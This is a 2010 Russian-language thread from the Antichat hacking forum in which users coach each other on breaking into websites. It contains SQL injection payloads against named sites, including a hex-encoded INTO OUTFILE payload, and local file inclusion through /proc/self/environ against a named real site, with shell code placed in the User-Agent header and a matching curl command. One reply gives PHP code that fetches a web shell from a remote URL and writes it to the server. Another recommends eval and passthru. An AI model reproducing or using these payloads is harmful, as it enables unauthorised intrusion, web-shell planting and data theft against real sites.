ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.07.2010, 00:26
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Dare
Dare said:
http://bible.com/bibleanswers_result.php?id=155%27+union+select+1,2 ,3,4,5,6,7,8,9--+
не могу вывести поля.
ни кто не подскажет в чем трабла?
критику принимаю достойно...
а кто сказал что должны всегда быть принтабельные поля?...
|
|
|
03.07.2010, 00:28
|
|
Познающий
Регистрация: 26.12.2006
Сообщений: 31
Провел на форуме:
95909
Репутация:
10
|
|
Сообщение от SeNaP
SeNaP said:
Как правильно составить двойной запрос?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]recordcount_new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ps_sql[/COLOR][COLOR="#007700"]){
global[/COLOR][COLOR="#0000BB"]$conn_s[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select COUNT(CODE) as count1 from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ps_sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn_s[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rs_s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rs_s[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'count1'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$rs_2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from tbl_subkat where KATCODE="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" order by POSITION, NAZV"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn1[/COLOR][COLOR="#007700"]);
while (([/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_2[/COLOR][COLOR="#007700"]))!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]recordcount_new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"tbl_base where ISMODER=1 and (SUBKAT1="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" or SUBKAT2="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" or SUBKAT3="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]")"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) echo[/COLOR][COLOR="#DD0000"]' ('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
-1+UniON+SelEcT+1+into+outfile+'1.txt'-- = 0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f 757466696c652b5c27312e7478745c272d2d
http://site.ru/kat.php?id=-1+UnioN+SeELcT+0x2d312b556e694f4e2b53656c4563542b3 12b696e746f2b6f757466696c652b5c27312e7478745c272d2 d,2,version(),4-- идем по порядку:
1) гет параметр передаецо только 1 и это id - других параметров не вижу
2) далее пошли перелопачивать все это(непонятно зачем селект был всего а работаем только с 1м столбцом)
3)потом через это рс начали делать запросы которые должны вернуть только число хотя мускулу пофиг в данном случае и проверок нет надлежащих, но смущает то что вывод происходит по именам столбцов а не по номерам(это и к первому и ко втророму куску кода относицо).
4) Наконец у нас в таблицах происходит выбор разного количества столбцов- а это уже в данном случае только блинда
последнее убивает окончательно:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) echo[/COLOR][COLOR="#DD0000"]' ('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
если сервер настроен так что не будет выдавацо ошибок мускула то дело тухлое - так как не сможем проверить даже правильный или нет первый запрос
|
|
|
|
03.07.2010, 00:34
|
|
Новичок
Регистрация: 10.06.2010
Сообщений: 1
Провел на форуме:
6274
Репутация:
0
|
|
Сообщение от Gorev
Gorev said:
чет не понял...есть фтп доступ и нет прав на заливку? чет нереально
да именно так, может потому что я пытаюсь залить через фтп клиент (FileZilla FTP Client)
|
|
|
|
03.07.2010, 01:26
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Serbies, вроде я понял как делать. Вот только остался один вопрос , как произвести SQL inj тут?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]select COUNT[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]CODE[/COLOR][COLOR="#007700"]) as[/COLOR][COLOR="#0000BB"]count1 from tbl_base where ISMODER[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]and ([/COLOR][COLOR="#0000BB"]SUBKAT1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]".[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE']."[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]SUBKAT2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]".[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE']."[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]SUBKAT3[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]".[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE']."[/COLOR][COLOR="#007700"])
[/COLOR][/COLOR]
$rs['CODE'] получаю от сюда
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$rs_2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from tbl_subkat where KATCODE="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" order by POSITION, NAZV"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn1[/COLOR][COLOR="#007700"]);
while (([/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_2[/COLOR][COLOR="#007700"]))!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][/COLOR]
т.е. 1,2,version(),4--
В таблице tbl_base находится 35 колонок |
|
|
|
03.07.2010, 12:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
1428
Репутация:
0
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
Как вариант, можно регнуться, залить аватар с пхп кодом и проинклудить. Или инклудь логи, подробнее
тут
_http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00
в User-Agent пишешь код шелла. Прошу прощения за возможный оффтоп. Подскажите, пожалуйста, как этот запрос
Код:
Code:
curl
"http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo();"
-H "User-Agent: "
оформить правильно в php и что есть такое ключ -H ?
Можно ли эту конструкцию юзать GET-ом в FF и юзерагент там-же менять?
|
|
|
|
03.07.2010, 13:07
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427
Репутация:
187
|
|
-H - дополнительный Header(заголовок) запроса
Сообщение от None
Можно ли эту конструкцию юзать GET-ом в FF и юзерагент там-же менять?
Можно |
|
|
|
03.07.2010, 13:18
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704
Репутация:
26
|
|
Потёр. Разобрался со слепой.
|
|
|
|
03.07.2010, 13:41
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Скажите, если есть возможность выполнить произвольный код на сайте, то как можно залить шелл? Например:
Код:
Code:
http://www.site.com/view=../../../../../../../../../../../../../proc/self/environ%00&cmd=phpinfo%28%29;
Каким кодом заменить phpinfo();, чтобы залить шелл? |
|
|
|
03.07.2010, 13:57
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
Сообщение от CyberHunter
CyberHunter said:
Скажите, если есть возможность выполнить произвольный код на сайте, то как можно залить шелл? Например:
Код:
Code:
http://www.site.com/view=../../../../../../../../../../../../../proc/self/environ%00&cmd=phpinfo%28%29;
Каким кодом заменить phpinfo();, чтобы залить шелл?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'./file.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w+'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'URL_до_ТХТ_с_шеллом'[/COLOR][COLOR="#007700"]));
[/COLOR][/COLOR]
|
|
|
|
03.07.2010, 14:42
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от CyberHunter
CyberHunter said:
Скажите, если есть возможность выполнить произвольный код на сайте, то как можно залить шелл? Например:
Код:
Code:
http://www.site.com/view=../../../../../../../../../../../../../proc/self/environ%00&cmd=phpinfo%28%29;
Каким кодом заменить phpinfo();, чтобы залить шелл? eval, passthru
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
